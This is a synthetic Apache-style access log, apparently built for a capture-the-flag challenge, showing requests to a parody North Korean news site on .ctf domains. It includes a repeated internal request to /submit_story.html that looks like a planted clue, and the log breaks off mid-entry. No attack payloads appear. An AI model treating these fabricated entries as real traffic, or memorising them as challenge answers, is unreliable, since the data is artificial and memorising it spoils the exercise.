HTTP/1.1" 200 3025 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +235.239.40.220 - - [23/Jul/2020:11:58:25 -0500] "GET /en/pyingpong-puppet-company/ HTTP/1.1" 200 14835 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +207.218.41.208 - - [23/Jul/2020:11:58:27 -0500] "GET /kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 5604 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:11:58:29 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +6.12.150.9 - - [23/Jul/2020:11:58:31 -0500] "POST /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 403 9823 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +62.8.143.165 - - [23/Jul/2020:11:58:32 -0500] "GET /en/quality-waterproof-liquid-made/ HTTP/1.1" 200 7829 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +20.2.28.133 - - [23/Jul/2020:11:58:33 -0500] "POST /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 200 14676 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +225.27.54.16 - - [23/Jul/2020:11:58:34 -0500] "GET / HTTP/1.1" 200 9067 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +185.212.219.73 - - [23/Jul/2020:11:58:38 -0500] "GET /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 6495 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" +245.135.248.14 - - [23/Jul/2020:11:58:42 -0500] "GET /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.0" 200 8269 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +147.129.234.181 - - [23/Jul/2020:11:58:45 -0500] "GET /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 200 2142 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4" +152.21.141.231 - - [23/Jul/2020:11:58:47 -0500] "GET /en/tele-education-system-upgraded/ HTTP/1.1" 200 14125 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.79 Mobile/14D27 Safari/602.1" +123.125.229.239 - - [23/Jul/2020:11:58:48 -0500] "POST /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 2932 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/55.0.2883.87 Chrome/55.0.2883.87 Safari/537.36" +123.143.117.170 - - [23/Jul/2020:11:58:49 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 301 2107 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +252.161.152.122 - - [23/Jul/2020:11:58:50 -0500] "POST /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 301 7881 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +66.116.77.169 - - [23/Jul/2020:11:58:51 -0500] "GET /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 7504 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)" +230.7.148.30 - - [23/Jul/2020:11:58:53 -0500] "GET / HTTP/1.1" 200 3602 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +158.186.130.115 - - [23/Jul/2020:11:58:57 -0500] "POST /new-kind-of-flowerpot-invented/ HTTP/1.0" 200 13298 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +187.77.232.18 - - [23/Jul/2020:11:58:58 -0500] "GET /north-kiringul-missile-program/ HTTP/1.1" 200 14629 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:58:59 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +95.98.164.239 - - [23/Jul/2020:11:59:00 -0500] "GET /pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 200 4155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10" +51.133.194.226 - - [23/Jul/2020:11:59:01 -0500] "GET / HTTP/1.0" 200 4181 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +76.213.169.203 - - [23/Jul/2020:11:59:02 -0500] "POST /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 13035 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" +45.164.140.5 - - [23/Jul/2020:11:59:05 -0500] "GET /loving-care-for-people-source-of-dprks-invincibility/ HTTP/1.1" 200 5541 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +190.148.62.237 - - [23/Jul/2020:11:59:09 -0500] "POST /mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 5544 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201" +43.189.189.96 - - [23/Jul/2020:11:59:11 -0500] "GET /north-kiringul-air-force/ HTTP/1.1" 200 11129 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +104.200.84.62 - - [23/Jul/2020:11:59:13 -0500] "GET /kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.0" 200 12677 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +180.79.111.79 - - [23/Jul/2020:11:59:16 -0500] "POST /en/pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 200 14411 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.5.17 (KHTML, like Gecko) Version/8.0.5 Safari/600.5.17" +246.51.139.48 - - [23/Jul/2020:11:59:18 -0500] "GET /nanotechnology-exhibition-in-dprk/ HTTP/1.1" 200 7621 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0" +175.168.74.20 - - [23/Jul/2020:11:59:22 -0500] "GET /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 200 10700 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +26.135.130.55 - - [23/Jul/2020:11:59:25 -0500] "POST /royal-blood-fresh-elixir-of-life/ HTTP/1.1" 301 9422 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.5.17 (KHTML, like Gecko) Version/8.0.5 Safari/600.5.17" +39.181.115.51 - - [23/Jul/2020:11:59:27 -0500] "POST /distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 200 13549 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +60.248.241.197 - - [23/Jul/2020:11:59:28 -0500] "GET /sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 200 3176 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:11:59:29 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +70.148.219.65 - - [23/Jul/2020:11:59:32 -0500] "GET /distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 200 4497 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +244.5.62.177 - - [23/Jul/2020:11:59:35 -0500] "GET /en/nuke-the-chinese/ HTTP/1.1" 500 8523 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" +66.186.110.3 - - [23/Jul/2020:11:59:38 -0500] "GET /en/tele-education-system-upgraded/ HTTP/1.0" 200 12157 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" +243.75.192.153 - - [23/Jul/2020:11:59:40 -0500] "GET /kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.0" 400 3767 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +148.17.112.36 - - [23/Jul/2020:11:59:44 -0500] "GET /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 200 9449 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +248.29.120.231 - - [23/Jul/2020:11:59:46 -0500] "POST /new-national-record-set-in-archery/ HTTP/1.1" 200 9851 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +139.163.122.89 - - [23/Jul/2020:11:59:48 -0500] "POST /en/ HTTP/1.1" 200 5388 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +72.219.7.157 - - [23/Jul/2020:11:59:51 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 200 2501 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +79.38.20.140 - - [23/Jul/2020:11:59:53 -0500] "GET /en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 14634 "http://www.google.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0" +123.108.187.176 - - [23/Jul/2020:11:59:55 -0500] "POST / HTTP/1.1" 404 11068 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36" +198.252.204.164 - - [23/Jul/2020:11:59:57 -0500] "POST /en/kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 301 7525 "http://www.nkcna.ctf" "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" +192.168.51.66 - - [23/Jul/2020:11:59:59 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +187.168.13.215 - - [23/Jul/2020:12:00:01 -0500] "GET /many-medical-scientific-achievements-made/ HTTP/1.1" 200 7422 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +86.118.102.193 - - [23/Jul/2020:12:00:04 -0500] "GET /en/ HTTP/1.1" 200 6259 "-" "Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +141.54.95.110 - - [23/Jul/2020:12:00:07 -0500] "POST /en/art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 12516 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36" +30.182.140.56 - - [23/Jul/2020:12:00:10 -0500] "GET /en/ HTTP/1.0" 200 11456 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)" +201.160.238.154 - - [23/Jul/2020:12:00:13 -0500] "POST /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 10475 "http://www.nkcna.ctf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +98.88.31.117 - - [23/Jul/2020:12:00:14 -0500] "GET /en/kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 5477 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +85.236.242.239 - - [23/Jul/2020:12:00:15 -0500] "GET /en/new-mushroom-research-institute-inaugurated/ HTTP/1.0" 200 5001 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +31.61.208.7 - - [23/Jul/2020:12:00:18 -0500] "POST /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 5907 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +153.199.198.74 - - [23/Jul/2020:12:00:19 -0500] "POST /north-kiringul-air-force/ HTTP/1.1" 200 14165 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +227.130.229.38 - - [23/Jul/2020:12:00:22 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 6104 "http://www.nkcna.ctf" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25" +147.95.176.143 - - [23/Jul/2020:12:00:24 -0500] "GET /kim-jong-fun/ HTTP/1.1" 301 10600 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50" +107.71.102.145 - - [23/Jul/2020:12:00:25 -0500] "GET /en/mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 301 11209 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +27.186.14.49 - - [23/Jul/2020:12:00:27 -0500] "POST /sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 200 8398 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:12:00:30 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +23.105.233.31 - - [23/Jul/2020:12:00:31 -0500] "POST /deep-pan-or-classic/ HTTP/1.1" 200 7286 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0" +40.219.107.155 - - [23/Jul/2020:12:00:34 -0500] "GET / HTTP/1.1" 200 2584 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +170.171.55.34 - - [23/Jul/2020:12:00:37 -0500] "GET /en/performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 200 12539 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0" +6.137.78.148 - - [23/Jul/2020:12:00:40 -0500] "GET /latest-rocket/ HTTP/1.1" 200 9430 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +247.52.40.181 - - [23/Jul/2020:12:00:43 -0500] "POST / HTTP/1.1" 200 11503 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +38.234.67.131 - - [23/Jul/2020:12:00:45 -0500] "POST /en/kumdang-2-injection-manufactured/ HTTP/1.1" 200 8393 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/55.0.2883.87 Chrome/55.0.2883.87 Safari/537.36" +210.108.78.72 - - [23/Jul/2020:12:00:46 -0500] "POST /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 301 8043 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0" +151.222.230.204 - - [23/Jul/2020:12:00:50 -0500] "POST /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 13848 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +117.66.199.163 - - [23/Jul/2020:12:00:52 -0500] "GET /phyongchon-pickle-factory/ HTTP/1.1" 200 8083 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" +161.73.218.97 - - [23/Jul/2020:12:00:56 -0500] "GET / HTTP/1.1" 200 6589 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +34.103.166.198 - - [23/Jul/2020:12:00:58 -0500] "GET /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 200 10195 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +16.45.120.75 - - [23/Jul/2020:12:00:59 -0500] "POST /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 13627 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:12:01:00 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +231.37.67.155 - - [23/Jul/2020:12:01:03 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 4128 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +171.105.183.134 - - [23/Jul/2020:12:01:05 -0500] "POST /en/99-problems/ HTTP/1.0" 200 5990 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +101.229.240.45 - - [23/Jul/2020:12:01:09 -0500] "GET /en/ HTTP/1.1" 200 4100 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +153.47.38.198 - - [23/Jul/2020:12:01:10 -0500] "POST /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 6415 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +174.139.10.152 - - [23/Jul/2020:12:01:13 -0500] "GET / HTTP/1.1" 200 8351 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +237.95.102.83 - - [23/Jul/2020:12:01:17 -0500] "GET /phyongchon-pickle-factory/ HTTP/1.1" 200 2641 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +78.114.97.236 - - [23/Jul/2020:12:01:18 -0500] "GET / HTTP/1.1" 200 6373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +227.154.94.211 - - [23/Jul/2020:12:01:22 -0500] "GET /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 304 3918 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +228.93.237.97 - - [23/Jul/2020:12:01:24 -0500] "POST / HTTP/1.1" 200 8046 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +122.138.36.155 - - [23/Jul/2020:12:01:26 -0500] "POST /en/ HTTP/1.1" 200 9235 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4" +192.168.51.66 - - [23/Jul/2020:12:01:30 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +74.198.158.146 - - [23/Jul/2020:12:01:30 -0500] "POST / HTTP/1.1" 200 8499 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +230.150.73.6 - - [23/Jul/2020:12:01:33 -0500] "POST / HTTP/1.1" 200 7369 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.79 Mobile/14D27 Safari/602.1" +32.162.146.5 - - [23/Jul/2020:12:01:34 -0500] "GET / HTTP/1.1" 200 8882 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +226.253.116.177 - - [23/Jul/2020:12:01:38 -0500] "GET /dancing-parties-held/ HTTP/1.1" 200 11410 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +243.169.172.29 - - [23/Jul/2020:12:01:41 -0500] "GET /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 12972 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +245.20.33.88 - - [23/Jul/2020:12:01:42 -0500] "GET /kim-jong-fun/ HTTP/1.0" 200 2734 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +44.187.18.48 - - [23/Jul/2020:12:01:44 -0500] "POST /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 4110 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +252.15.111.77 - - [23/Jul/2020:12:01:46 -0500] "GET /en/north-kiringul-air-force/ HTTP/1.1" 500 8538 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.79 Mobile/14D27 Safari/602.1" +119.126.125.47 - - [23/Jul/2020:12:01:50 -0500] "GET /new-books-published-in-dprk/ HTTP/1.0" 500 7435 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +173.3.228.213 - - [23/Jul/2020:12:01:52 -0500] "GET /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 200 2468 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +200.233.28.202 - - [23/Jul/2020:12:01:54 -0500] "POST /en/nuke-the-chinese/ HTTP/1.1" 200 14177 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +202.8.50.23 - - [23/Jul/2020:12:01:57 -0500] "POST /en/new-kind-of-flowerpot-invented/ HTTP/1.1" 200 5795 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +192.168.51.66 - - [23/Jul/2020:12:02:00 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +56.132.129.180 - - [23/Jul/2020:12:02:01 -0500] "GET /new-books-published-in-dprk/ HTTP/1.1" 403 3152 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +223.16.140.70 - - [23/Jul/2020:12:02:02 -0500] "GET /dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.1" 200 12664 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +146.94.181.55 - - [23/Jul/2020:12:02:04 -0500] "GET /many-medical-scientific-achievements-made/ HTTP/1.1" 200 3457 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +126.30.198.88 - - [23/Jul/2020:12:02:05 -0500] "GET /en/dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.0" 200 5247 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +111.62.54.147 - - [23/Jul/2020:12:02:06 -0500] "GET /royal-blood-fresh-elixir-of-life/ HTTP/1.1" 200 9928 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:30.0) Gecko/20100101 Firefox/30.0" +37.32.102.11 - - [23/Jul/2020:12:02:09 -0500] "GET /north-kiringul-air-force/ HTTP/1.1" 200 12788 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +113.62.153.241 - - [23/Jul/2020:12:02:12 -0500] "GET /en/art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 4513 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +175.125.57.143 - - [23/Jul/2020:12:02:13 -0500] "GET /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.0" 200 5585 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +99.11.29.229 - - 